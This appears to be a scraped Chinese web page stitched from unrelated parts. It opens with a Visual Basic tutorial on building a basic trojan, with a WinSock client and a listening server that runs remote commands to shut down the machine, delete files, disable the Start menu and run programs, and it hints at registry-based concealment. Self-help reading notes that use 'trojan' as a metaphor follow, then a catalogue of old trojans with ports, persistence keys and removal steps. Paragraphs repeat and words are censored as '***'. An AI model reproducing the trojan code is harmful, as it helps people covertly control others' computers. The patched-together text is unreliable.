木马怎么做 (举例)
使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。
在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:
Private Sub cmdConnect_Click()
If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
MsgBox ("请输入主机名或主机IP地址。")
Exit Sub
Else
If Len(Text1.Text) 0 Then
tcpClient.RemoteHost = Text1.Text
Else
tcpClient.RemoteHost = Text2.Text
End If
End If
tcpClient.Connect
Timer1.Enabled = True
End Sub
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:
Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub
准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:
Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
If tcpServer.State sckClosed Then
tcpServer.Close‘检查控件的 State 属性是否为关闭的。
End If ’如果不是,在接受新的连接之前先关闭此连接。
tcpServer.Accept requestID
End Sub
这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。
2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:
Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)
Dim strData As String
Dim i As Long
Dim mKey As String
tcpServer.GetData strData
‘接收数据并存入strData
For i = 1 To Len(strData)
‘分离strData中的命令
If Mid(strData, i, 1) = "@" Then
mKey = Left(strData, i - 1)
‘把命令ID号存入mKey
‘把命令参数存入strData
strData = Right(strData, Len(strData) - i)
Exit For
End If
Next i
Select Case Val(mKey)
Case 1
‘驱动器名、目录名、文件名
Case 2
强制关闭服务器端的计算机
Case 3
强制重启服务器端的计算机
Case 4
屏蔽任务栏窗口;
Case 5
屏蔽开始菜单;
Case 6
按照客户机端传过来的文件名或目录名,而删除它;
Case 7
屏蔽热启动键;
Case 8
运行服务器端的任何程序
End Select
End Sub
详细程序略。
客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。
另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:
Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub
这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中 *** ,是修改系统注册表的 *** 。
这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中 *** ,是修改系统注册表的 *** 。
成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要解决。警告:千万不要用BO程序破坏别人的系统。
《人类木马程序》
看完快一个月了,感觉有影响我后面的生活想法
木马程序就跟电脑的木马一样,病毒跟着正常的程序进入电脑,就跟特洛伊木马屠城记那样。
里面有多种模块,自己各种不够好的模块,更会让自己代入,深入自己的木马病毒,让别人认为你以为各种不够好
P24
只要中了“觉得自己不够好”的木马程序,人机、感情、金钱等各方面就会开始自行运作出痛苦的生命剧情。因为她怕人靠近,人家进她就退,不相信自己值得爱,会无意识地不信任他人,有意识地推掉爱。即使别人说她好,她也会自责、自卑,觉得自己不够好,这个信念不放过她,最终创造出自己的地狱。。。。她无意识地想要以一连串违心之言打退对方,来证明她所想的“自己不够好,不值得被爱”是对的,这就是木马程序“自找麻烦、自寻苦恼,把爱扭曲成恐惧”的所在。
P35
我已经很好了,本自具足,完全不需要跟谁比较,不需要再做什么去变得更好,我以全然无条件信任自己、爱自己的频率,感谢我目前的一切‘。
(不需要想我要更好的自己,满足于现在的自己,这个时间下的自己已经很棒了,不去与他人比较)
倾听自己的内心,去找与自己共鸣的话语,去了解自己。
p88
想要通过“帮助他人”来产生自我价值感,填补自己内心空缺,但实际上,外在做再多事也填补不了。一旦你内心空洞不扎实,在帮助别人的时候,潜意识其实想要的是别人的赞美、肯定、爱、感谢与尊重,以填满你内心的洞缺,你的帮助带有潜在目的性。倘若对方回馈不足够,内心空洞、不扎实的你就会陷入空虚,会很受挫,觉得没有价值感,没有爱。如果有另一位跟你一起帮助大家的人,得到的赞美与感谢比你多,你一样会感到受挫,因为你把填洞的 *** 交到别人手上了。
(这就是我!!我是挺爱帮助身边人的,其实就是为了让自己有价值,做了别人又不感谢你会不开心,读完以后觉得没必要把主动权交给他人,自己开心就好哈哈)
把自己调成“爱”的频率,一旦有爱,独处也不会孤单,也只有爱才可能吸引跟你一样频率的人一起共处,否则只会产生更多问题与课题。
殊不知,一个失去自我的人,就像是一个没有地址、没有定位的房子,别人想寄包裹(爱)给你,都不知道寄到哪儿,因为你连自己是谁都不知道,别人怎么找得到你?怎么爱你?
心诚事享。心想事成是欲望的层次,事成心想是梦想的层次,心诚事享是无欲无梦,一切早已具足,享受大圆满的境界(高我、全我、平行我)
如果你觉得伴侣对你失去热情,可能是因为你也对他失去热情。当我们跟一个人越亲密,就越容易产生厌恶,因为他让你看到自己的真面目。别人最惹你讨厌的地方,通常也是你最受不了自己的地方。你是什么样的人,就会认为别人是什么样。你不能容忍他人的部分,就是不能容忍自己的部分。一个品德不好的人,就会怀疑别人的品德;个对别人不忠诚的人,也会怀疑别人对他的忠诚;一个不正直的、不正经的人,就会把别人的任何举动都“想歪”,因为他就是那样的人。个对别的女人有非分之想的人,自然而然地,也会猜疑自己的女人。老到讨厥的事的人、往往是令人讨厌的人。喜欢挑人毛病的人,其实自己总是最有毛病。如果你猥爱发脾气,你就会认为别人常惹你生气、一件事都可能变成你愤怒的理由,你会把隐藏在自己内在的东西投射到别人身上。你会谴责每一个人、每一件事,因为你有太多的怒气、所以即使是一点小事也能引燃怒火。你内在是什么,就会被什么的人吸引。你对外排斥什么,对内就排斥什么。首先你要深入内在,除非猕内在的问题先解决,否则你不但无法改善,而且会制造更多问题。一个有控制欲的人,除非内在的空虚得到填补,否则就不可能放下人,也难以解放自己;一个满怀怨恨的人,除非内在愤懑的情绪得到野解,否则就不可能停止怨恨;一个爱嫉妒的人,除非内在能找到自信,不再眼人比较,否则就不可能停止嫉妒。你如果无法信任自己,就很难信任别人;你如果无法尊重自己,就很难尊重别人;你如果无法肯定自己,就很难肯定别人;你如果不能照亮自己,就不可能照亮别人。你约束别人,自己也会被约束。你越恨就越束缚,你越爱就越自由。当你掌控别人时,你同时也被掌控;如果你绑住别人,别人也会绑住你。你想想看,当你控制别人,不准他们做这做那,那如果他们不照你说的话去做呢?你会怎么样?你就会不高兴,对吗?你的喜怒哀乐是由别人来决定,你认为他们是被你掌控的吗?不,其实你总是被掌控的。以后当别人指责你的时候,不要再像以前一样,立刻去攻击或反击,你要开始反问自己,因为他们说的很可能是真的。如果不是真的,你又何必那么“当真”,对吗?你与每个人的关系,都反映出你与自己的关系。如果你不断与自己的内在冲突,那么你也会不断地与别人冲突。我们在感情中所遭遇的问题,就是我们内在的问题。我们吸引的关系,都反映出我们拥有的特质,以及呈现我们的内在自我。所以,关系出问题的人,不仅要检讨你跟别人的关系,也要反省你跟自己的关系他们
《人类木马程序》~自我与人际关系的木马程序及解法
宇宙,生生不息,无边无际,没有时空限制,包罗万象,无限制。
像水一样,水利万物而不争。
像太阳一样,厚德载物,源源不断提供地球生命能量。
像空气一样,看不见摸不着,但是它就是在那里,无私地奉献。
因此他们成为我们人类乃至整个生物界的生命起源。
爱是地球上乃至整个宇宙更大的能量场,爱与不爱之间的距离犹如近在眼前,又犹如远在天涯。取决于能量调频。
所有木马程序
起因认为自己不被爱
觉得自己不被爱,包括存在感不足模组,所以怀疑自己不够好
茫然、自暴自弃、破罐子破摔,包括茫然模组,失败模组,害怕模组,不自信模组。
包括抢快抢先模组争赢模组,反叛模组,控制狂模组,因孤独木马程序而形成的鹤立鸡群,高处不胜寒,救众生救世界模组。
严格控制,鞭策自己达到成功
~以为成功实现目标之后,自己就会变好,就值得被爱~发现成功与名利填补不了内心的空缺。
亚历山大.劳埃德博士说过人类的问题只有两种根源,一个是感到自己不重要,另一个是没有安全感。 前者问题是以男人为重,后者问题的女人为多,于是衍生出一系列的感情问题、亲子问题、亲情问题、身心健康、工作问题等等,陷入死循环,痛不欲生。甚至我们在时空位置上会发生错乱,多年前发生的某件事,导致我们一辈子心结难以打开,心智还停留在痛苦的那一刻,永远长不大。
解决这两个问题的最根本的 *** 是,只要恢复自己原厂设定的自信(自我价值的认同)与安全感,所有的问题都会瞬间消失。
看待问题,从根源去直接超越。
what:不知道自己喜欢什么,能做什么,这是高度控制的父母和教育,使孩子陷入茫然模组的模式,孩子无法自己做决定,不知道自己喜欢什么能做什么。
how:
旧版本不是问题,问题是你要去哪里,所以要花时间去探寻自己的天赋,重新找回自己。
以旁观者视角看清究竟自己在做什么事情的时候会乐此不疲,废寝忘食,然后在那件事情上花时间并享受这个过程,不需要去问任何人的意见,也不需要告诉父母,最重要的是请先不要想失成败。
what:无论再怎么努力都会失败的起因,所以在之后的人生中,总在最关键的时刻让自己失败,比赛前一天身体出状况,拒绝求爱,拒绝资金......
how:改写或重新诠释重置挫败的版本,不要把那件事直接定义成自己,永远都会失败,可以用创意换一个有趣的新版,全是例如,吃慢点对胃比较好,没吃到棒棒糖对牙齿好,否则他已内建的这组木马程序,会一直无意识的破坏他的人生。
还有一个 *** ,把自己拉到高维度,和小时候的自己对话,把当初的那个感觉不被爱,不被肯定的挫败恐惧愤怒的频率调回到爱与信任,用潜意识法输入爱的程序:我爱我自己,我非常认可我自己,对照着镜子练习,不断唤醒内在爱的力量。
结果实践第二种 *** 后,往后若遇到有人跟过去的自己面临类似的问题时,可以无条件的帮助他,因为你帮过去的自己解决问题,未来的你就会遇到在关键时刻出手救你脱困的贵人。
恐惧有三个层次
之一个层次,恐惧事情本身
第二个层次,害怕面对恐惧背后的创伤
第三个层次,恐惧是内在的投射,缺乏安全感,内在匮乏,它是你灵魂功课的真实写照。
what:害怕模组的形成是管教严格的父母,若小孩不是叛逆期,很容易形成另一种极端,完全温驯,久而久之无法自己做主,因为父母会帮他做决定,所以在这些孩子身上,不仅出现了茫然模组,也容易出现害怕模组,他们的口头禅就是,我怕什么什么,我不会什么什么。
how:平时要聆听自己经常重复在说的词是什么,可以用录音笔记录每天的所言所思所行,回放一下,你就会轻易发现自己语言模式或者行为模模式中的木马程序。
许多父母的爱已经被木马程序转化为恐惧频率,以唠叨威胁,恐吓的方式逼孩子听话,久而久之,一代传一代不自知。
恐高并不是怕高,而是怕摔下来,当我们已经是成年人了,要试着把恐惧看深一点,大胆面对它,转化它,现在请你写下你怕在谁面前失败出丑,同时也写下十件令你恐惧,但又感到自己受局限的事,然后深究这些是从哪里来的。
请找到自己害怕的人事物,这些都是围困你已久的木马程序之墙。
举例:如果你怕高,可以请你信任的人陪你走玻璃栈道或坐摩天轮,以开心冒险替代担忧恐惧的频率。
如果你怕黑,黑暗也是连接着恐惧,尝试着和信任的人在黑暗的地方安静的待着,突破黑暗。
种这组木马程序的人口头禅是我可以吗?我真的可以吗?我不行吧,我试试,慢慢跟上......
霍金斯意识能量层级表正向频率带啊,更具基本的标准:勇气肯定/200都达不到。要辨认这个模组很简单,若常觉得别人很骄傲,总是遇到看不起瞧不起,不尊重你的人,或是怕自己被别人洗脑,就表示你内在有不自信恐惧,失去自己甚至自卑的木马程序。
还有一种情况,别人的自信也会 *** 出不自信/自卑者的木马程序,他们认为这些人太骄傲,也经常觉得自己被瞧不起,但自我价值应由自己来决定,与别人无关。
比较严重的自信不足,自卑者甚至都不敢看对方的眼睛,因为他们也怕被看穿。
久而久之,中这个模组的人很容易形成恶性循环,他不自信,别人也不把不放心把她的事事情交给他处理。
一个不信任自己的人,别人也很难相信他。
举例:
我们生活当中,会遇到很多类似“受害者”的人和极端欺凌别人的人,严重的会演变为“觉得自己不值得活着”,类似抑郁症,暴躁症患者。
同样的发射能量频率不同,所达到的结果也不同。
韩国电影《 *** 》,女主母亲难产去世,父亲怪她害死自己的妻子,所以她的潜意识是自己不应该出生,于是她的行为极端,吃饭一粒一粒米吃,将父亲对她的暴力转化为自己对自己的暴力。同样佛陀的父亲在他母亲去世后用爱不是恐惧与愤怒频率。
两者结果完全不同。
爱与不爱犹如近在咫尺,也犹如远在天涯。
how:从现在起,遇到问题不要急着问别人,试着自己去思考解答,以后你就不再是等待答案的提问者,而是自找答案的解答者。
这两个频率差别比较大,升频后久而久之,内在父母才能战胜那顽劣调皮的内在小孩,真正让你不需要在意别人的眼光,你就是你自己。
所有的频率爱与喜悦,焦虑与恐惧其实是代代相传的,所以我们要仔细观察自己的祖父母,外祖父母父母以及亲戚的共同模组,看他们都在害怕,焦虑,担忧什么,自己是否被影响,甚至被植入相同的频率,透过家族史的探索和家族排列来帮助自己找到并解除木马程序。
最终将我们的频率从恐惧与焦虑变为爱与喜悦。
how:偶像就是一面镜子,把自己喜欢这个人的特质写下来,这是在提醒自己也可以发掘的潜能,无需去盲目追求他,化有形为无形。
老师、老板指示,为你引一小段的路灯,重点是自己要达到的目的地,你可以问他人你生命人生的意义使命目的,但是你为什么要问别人,“你家怎么走”?
how:有意识地或在潜意识当中植入,只要离开或者做某事情的事,开始就是要根植做事情由始至终的念头,以第三者的角度看一下这件事情是否结束。
努力追求高学历高成就高明丽王乐,其实最重要的是天赋热忱和实力。
此模板是逆反心理期。“反叛模组”是不顺从父母的意见,坚持走自己的路。
1.反叛之清楚模组
知道自己喜欢什么并坚持到底
.坚持己见,终于成功
.坚持己见,不成功
2.反叛之茫然组
不知道自己喜欢什么,只为了自己的自 *** 不被剥夺,证明自己或者求得关注,一路上为了反对而反对,为了破坏而破坏,破罐子破摔,玉石俱焚。
.独裁模组 完全反叛
what:不信任别人,不用心倾听别人,即使这个意见对他再好。这种人往往会吸引到“自责模组”的人。
how:由他自己全权决定,并全权负责,即使他不满意结果,若愿意自己检讨就没有问题;如果失败了,抱怨别人,不怨自己就是下一种模式。
.抱怨模组 抱怨别人、怪罪别人
what:孩子没有承担责任,父母一味娇惯,把责任推卸给外在,长大后会加入“怪罪别人,责怪外在环境”的抱怨模组。
how:如果有人抱怨,要仔细观察他抱怨的是什么,他到底想要什么或者需要别人帮他解决什么问题。让这类型人了解把时间花在哪里,就是把自己的振动频率定在哪个版本上,就会显化成什么人。因为怎么用时间,决定了我们是谁——我们在生命中练习什么,我们就精通什么。
记得要跳出抱怨,不要以“抱怨”作为跟别人要挟额外补偿或好处的手段,那只会让其他人对你敬而远之。
举例:
抱怨楼上孩子哭闹声———
理解因为婴儿夜哭,如果去理论,其他邻居被吵到,也会烦,做到“己所不欲勿施于人”。
开车被人家挡了路——
我要怎么才不会挡别人的路而不自知。
通过调频从愤怒仇恨150、罪恶谴责30,拉到宽容原谅350。
what:
个性急,总会抢在别人前面去冒险尝试,然后把经验分享给后面的人和追随者。
“快”既是他们的特点、优点,也是他们的盲点、弱点。
how:把眼前窄化冲刺的跑道拉宽、拉高维度,用全景全息,鸟瞰、复验眼、多重视野的方式来破解盲点的局限。
现在请你写下自己有哪些特点,同时也是优点,缺点,弱点,盲点,致命点,有哪些地方需要改善?这些特点形成了你的哪些优势?它造成了现在我过去的哪些问题?
what:抢队,快食,躁动而导致肠胃问题,焦虑症,躁郁症,自律神经失调,做事没有耐心,总觉得自己动作快,别人动作慢。
优势是自己的事情可以很快完成。
问题是与别人无法配合,越催别人做得越不好,因而总吵架,造成人际关系紧张。
how:让自己保持有知觉的缓慢深呼吸,动作尽可能的慢,每天花一点时间稳住自己内部的生命和新的机,让自己保持更高的弹性更深的宁静更高的智慧,更多的爱,更少的框架与束缚,内心强大无惧,身体随时维持纯净平衡,从低频调到高频,让自己跳脱恶性循环,没有比较,也不必让自己变成什么,不会有焦虑的频率带着你抢先冲快,只要将与生俱来的能量释放出来,就能够成为有力量的自己。
让自己慢下来,每天养成晒太阳运动练瑜伽 *** 冥想的习惯,每隔一段时间去度假或禁语闭关是破解抢快抢先模组的 *** 之一。
what:经常出现的关键词有,“适者生存,不适者淘汰“,“赢在起跑线”,“步步为营”,“爱拼才会赢”,“出人头地”,“光宗耀祖、光耀门楣”“人死留名,豹死留皮”“咽不下这口气,要争一口气”“,一定要争取自己的权益”,他们的座右铭是“爱拼才会赢”,因为他们设定了“爱拼”,所以潜意识不断选择创造出瓶颈的竞技场,从而给自己拼搏的机会。
这种“争赢模组”的人最会无事生非,小事化大,星火燎原,一直找战场,直到自己输了为止,只有清除此模组才能大事化小,小事化了。
他们以赢别人来建立自己的存在价值感。(价值观)
“争赢模组”最容易产生“不注意视盲”,他们潜意识只会关注人多的地方或大家在抢的地方。
他们所中的木马程序造成的 问题 就是浪费无所谓的时间去追逐木马设的虚幻目标,等到达时恍然大悟,跑这么快跑到这里到底要做什么。最后就算赢了,因为你并不喜欢,没有热忱,很快就会感到无聊,无趣无动力,然后进入茫然期。
举例:身陷三角关系,特别是事业女强人型的第三者身上,看到他在学校职场生活中总是抢赢资源。所以他必须通过争赢感情来证明自己更好,更美,更值得被爱,若是顺利争赢,成为合法关系,只要频率没有改变,接下来的婆媳关系、与女儿争宠、老公外遇就是后续的问题。
how: 多问自己究竟是要争赢,证明自己是对的,还是让自己快乐,让大家都快乐。
要知道,用这些时间做更重要的事情,别忘了时间比面子更贵。
如果碰到对方中了争赢模式组,你可以试试无条件礼让他,对方有可能会跟你抢着让利。
如果有人辱骂你,你就无条件的认同对方,让他一直赢没多久,他可能就会感到无趣,而离开你就能顺利脱困了。
罗伯特.奥古斯都.马斯特斯提出“灵魂逃避”:有人想要被关注、被尊重,想要权力,也想要金钱 所以让自己借着修行和帮助别人来逃避现实。
之一个有拯救心理情结的,想要帮助更多的人帮助别人,其实是自己的内在,再跟自己的求助,你真正需要的帮助的是自己。内在空虚孤独就是目前最核心也是最主要的木马程序,它逼你成为更优秀的人,好为人师去接受别人的尊重,拿回被控制型父母,拿走的自 *** 利,也 只有把自己逼到高处,让自己鹤立鸡群,才可以掩饰自己孤独的窘境。
第二,自己太优秀,身边的人都配不上你,你看不上别人,远远把别人抛在脑后,所以继续孤独,无意识讨厌嫌弃你的追求者,反而爱慕对自己不理不睬的人,这里有“自卑不自信”模式,所以看不起“爱上自己的人”,反而爱慕“不爱自己的人”。
第三,经常以工作忙,生活忙为由不理会他人来掩饰孤独;
第四,不想求人,有怕被拒绝、怕丢脸的自尊木马程序,这不是真的独立自强,原因是孤独与信任,爱的能量是相反的,所以从孤独发出来的频率,势必与自己、与他人关系的课题。
如果仅仅是通过想“帮助他人”让自己看起来是个帮助弱小的优秀强者,这就是虚假高台,对应等级是第12级渴爱欲望的频率,如果事情发生终止,此时频率就会随时掉下来。
只有在内心充满爱与丰足,宁静喜悦,安详极乐,开悟正觉频率,才能真正做到“大家一起好”。
即使没人认得他也不焦虑、恐慌,也让人识得他不骄傲,不恐惧。
举例,孟晚舟被加拿大拘留,做好视死如归的打算,任正非也做好此生见不到女儿的打算,在国家利益和个人利益,舍小家保大家。
心越真实就越有力量,想要跳脱出这个循环,以帮助者的角度帮助自己解决内心孤独的问题,问自己从出生到现在,孤独感是怎样来的?你真的孤独吗?孤独本身,是不知道自己怎么跟自己相处的木马程序,并不是真正意义上面的孤独?
人出生就本自具足,所有因为害怕孤独怕无聊,怕自己没有价值感而做的事情,是为了填补并逃避,面对自己空虚的时间。
他们总是对孩子们说“你应该如何如何,因为我都是为了你好”,“应该”和“为了你好”都是木马程序的关键词。
何念慈说,凡是你想控制的,其实都控制了,你人活得累,一是太认真,二是太想要。
遇到控制型的父母,无论孩子还是成年人最终都走向两个极端。
一种:自暴自弃(茫然模组,不自信/自卑模组,存在感不足模组);
另一种:孩子“继承”控制狂,“严于律己”,但是不可能“宽以待人”(愤怒仇恨,恐惧焦虑,罪恶谴责 ,羞愧耻辱)。
例子:他自己从来不迟到,万一迟到了,他就拿自我要求的标准,会让身边人紧张、有压力和害怕。
长期处于控制型,座右铭是“有志者事竟成”“天下无难事,只怕有心人”,总想要完美,所以缺乏变通与弹性,很难与人合作,一旦失控就抓狂。
一旦身边人不符合自己的标准,引发的情绪频率可能是愤怒仇恨,恐惧焦虑,罪恶谴责,羞愧耻辱。
how:
放弃对别人的“要求”,因为控制是“不信任”的焦虑能量投射出来,让对方感觉不被信任,因而没有信心和动力主动把事情做好,随时提醒自己放手,破解这组木马程序的关键词是: 信任生命,信任爱。
不苛责自己,对自己好,百分之百接纳自己,爱自己,爱与喜悦的频率,才能让人如沐春风。
理解大自然中没有“浪费时间”概念,不要让焦躁拖了后腿。
只要清楚“自律控制”的木马程序,不需要鞭策出更好的自己,现在就是原初更好的自己,不需要计划,在更高纬度的层次中,一切都已完美。
历史上最厉害的木马病毒有哪些
一、 *** 公牛。 *** 公牛又名Netbull,是国产木马,默认连接端口23444,最新版本V1.1。服务端程序newserver.exe运行后,会自动脱壳成checkdll.exe,位于C:\WINDOWS\SYSTEM下,下次开机checkdll.exe将自动运行,因此很隐蔽,危害很大。同时,服务端运行后会自动捆绑以下文件: win9x下:捆绑notepad.exe;write.exe,regedit.exe,winmine.exe,winhelp.exe。 winnt/2000下:(在2000下会出现文件改动报警,但也不能阻止以下文件的捆绑)notepad.exe,regedit.exe,reged32.exe,drwtsn32.exe;winmine.exe。 服务端运行后还会捆绑开机时自动运行的第三方软件(如:realplay.exe、 *** 、ICQ等)。在注册表中 *** 公牛也悄悄地扎下了根,如下: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "CheckDll.exe"="C:\WINDOWS\SYSTEM\CheckDll.exe" [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] "CheckDll.exe"="C:\WINDOWS\SYSTEM\CheckDll.exe" [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run] "CheckDll.exe"="C:\WINDOWS\SYSTEM\CheckDll.exe" 在我看来, *** 公牛是最讨厌的了。它没有采用文件关联功能,采用的是文件捆绑功能,和上面所列出的文件捆绑在一块,要清除非常困难!你可能要问:那么其它木马为什么不用这个功能?哈哈,其实采用捆绑方式的木马还有很多,并且这样做也有个缺点:容易暴露自己!只要是稍微有经验的用户,就会发现文件长度发生了变化,从而怀疑自己中了木马。 清除 *** : 1、删除 *** 公牛的自启动程序C:\WINDOWS\SYSTEM\CheckDll.exe。 2、把 *** 公牛在注册表中所建立的键值全部删除(上面所列出的那些键值全部删除)。 3、检查上面列出的文件,如果发现文件长度发生变化(大约增加了40K左右,可以通过与其它机子上的正常文件比较而知),就删除它们!然后点击“开始-附件-系统工具-系统信息-工具-系统文件检查器”,在弹出的对话框中选中“从安装软盘提取一个文件(E)”,在框中填入要提取的文件(前面你删除的文件),点“确定”按钮,然后按屏幕提示将这些文件恢复即可。如果是开机时自动运行的第三方软件如:realplay.exe、 *** 、ICQ等被捆绑上了,那就得把这些文件删除,再重新安装。 二、 *** 神偷(Nethief) *** 神偷又名Nethief,是之一个反弹端口型木马! 什么叫“反弹端口”型木马呢?作者经过分析防火墙的特性后发现:大多数的防火墙对于由外面连入本机的连接往往会进行非常严格的过滤,但是对于由本机连出的连接却疏于防范(当然也有的防火墙两方面都很严格)。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口,当要建立连接时,由客户端通过FTP主页空间告诉服务端:“现在开始连接我吧!”,并进入监听状态,服务端收到通知后,就会开始连接客户端。为了隐蔽起见,客户端的监听端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似“TCP 服务端的IP地址:1026 客户端的IP地址:80 ESTABLISHED”的情况,稍微疏忽一点你就会以为是自己在浏览网页。防火墙也会如此认为,我想大概没有哪个防火墙会不给用户向外连接80端口吧, 嘿嘿。最新线报:目前国内木马高手正在大规模试验(使用)该木马, *** 神偷已经开始流行!中木马者也日益增多,大家要小心哦! 清除 *** : 1、 *** 神偷会在注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下建立键值“internet”,其值为"internet.exe /s",将键值删除。 2、删除其自启动程序C:\WINDOWS\SYSTEM\INTERNET.EXE。 OK,神偷完蛋了! 三、WAY2.4(火凤凰、无赖小子) WAY2.4又称火凤凰、无赖小子,是国产木马程序,默认连接端口是8011。众多木马高手在介绍这个木马时都对其强大的注册表操控功能赞不绝口,也正因为如此它对我们的威胁就更大了。从我的试验情况来看,WAY2.4的注册表操作的确有特色,对受控端注册表的读写,就和本地注册表读写一样方便!这一点可比大家熟悉的冰河强多了,冰河的注册表操作没有这么直观--每次我都得一个字符、一个字符的敲击出来,WAY2.4在注册表操控方面可以说是木马老大。 WAY2.4服务端被运行后在C:\windows\system下生成msgsvc.exe文件,图标是文本文件的图标,文件大小235,008字节,文件修改时间1998年5月30日,看来它想冒充系统文件msgsvc32.exe。同时,WAY2.4在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下建立串值Msgtask,其键值为C:\WINDOWS\SYSTEM\msgsvc.exe。此时如果用进程管理工具查看,你会发现进程C:\windows\system\msgsvc.exe赫然在列! 清除 *** : 要清除WAY,只要删除它在注册表中的键值,再删除C:\windows\system下的msgsvc.exe这个文件就可以了。要注意在Windows下直接删除msgsvc.exe是删不掉的,此时你可以用进程管理工具终止它的进程,然后再删除它。或者到Dos下删除msgsvc.exe也可。如果服务端已经和可执行文件捆绑在一起了,那就只有将那个可执行文件也删除了! 注意:在删除前请做好备份。 四、冰河 冰河可以说是最有名的木马了,就连刚接触电脑的用户也听说过它。虽然许多杀毒软件可以查杀它,但国内仍有几十万中冰河的电脑存在!作为木马,冰河创造了最多人使用、最多人中弹的奇迹!现在网上又出现了许多的冰河变种程序,我们这里介绍的是其标准版,掌握了如何清除标准版,再来对付变种冰河就很容易了。 冰河的服务器端程序为G-server.exe,客户端程序为G-client.exe,默认连接端口为7626。一旦运行G-server,那么该程序就在C:\Windows\system目录下生成Kernel32.exe和sysexplr.exe,并删除自身。Kernel32.exe在系统启动时自动加载,sysexplr.exe和TXT文件关联。即使你删除Kernel32.exe,但只要你打开TXT文件,sysexplr.exe就会被激活,它将再次生成Kernel32.exe,于是冰河又回来了!这就是冰河屡删不止的原因。 清除 *** : 1、删除C:\Windows\system下的Kernel32.exe和Sysexplr.exe文件。 2、冰河在注册表HKEY_LOCAL_MACHINE\software\microsoft\windows\ CurrentVersion\Run下扎根,键值为C:\windows\system\Kernel32.exe,删除它。 3、在注册表HKEY_LOCAL_MACHINE\software\microsoft\windows\CurrentVersion\Runservices下还有键值为C:\windows\system\Kernel32.exe的,也要删除。 4、最后,改注册表HKEY_CLASSES_ROOT\txtfile\shell\open\command下的默认值,由中木马后的C:\windows\system\Sysexplr.exe %1改为正常情况下的C:\windows\notepad.exe %1,即可恢复TXT文件关联功能。 五、广外女生 广外女生是广东外语外贸大学“广外女生” *** 小组的处女作,是一种新出现的远程监控工具,破坏性很大,远程上传、下载、删除文件、修改注册表等自然不在话下。其可怕之处在于广外女生服务端被执行后,会自动检查进程中是否含有“金山毒霸”、“防火墙”、“iparmor”、“tcmonitor”、“实时监控”、“lockdown”、“kill”、“天网”等字样,如果发现就将该进程终止,也就是说使防火墙完全失去作用! 该木马程序运行后,将会在系统的SYSTEM目录下生成一份自己的拷贝,名称为DIAGCFG.EXE,并关联.EXE文件的打开方式,如果贸然删掉了该文件,将会导致系统所有.EXE文件无法打开的问题。 清除 *** : 1、由于该木马程序运行时无法删除该文件,因此启动到纯DOS模式下,找到System目录下的DIAGFG.EXE,删除它。 2、由于DIAGCFG.EXE文件已经被删除了,因此在Windows环境下任何.exe文件都将无法运行。我们找到Windows目录中的注册表编辑器“Regedit.exe”,将它改名为“Regedit.com”。 3、回到Windows模式下,运行Windows目录下的Regedit.com程序(就是我们刚才改名的文件)。 4、找到HKEY_CLASSES_ROOT\exefile\shell\open\command,将其默认键值改成"%1" %*。 5、找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ RunServices,删除其中名称为“Diagnostic Configuration”的键值。 6、关掉注册表编辑器,回到Windows目录,将“Regedit.com”改回“Regedit.exe”。 7、完成。 六、聪明基因 聪明基因也是国产木马,默认连接端口7511。服务端文件genueserver.exe,用的是HTM文件图标,如果你的系统设置为不显示文件扩展名,那么你就会以为这是个HTM文件,很容易上当哦。客户端文件genueclient.exe 。如果不小心运行了服务端文件genueserver.exe,它会装模作样的启动IE,让你进一步以为这是一个HTM文件,并且还在运行之后生成GENUESERVER.htm文件,还是用来迷惑你的!怎么样,是不是无所不用其极? 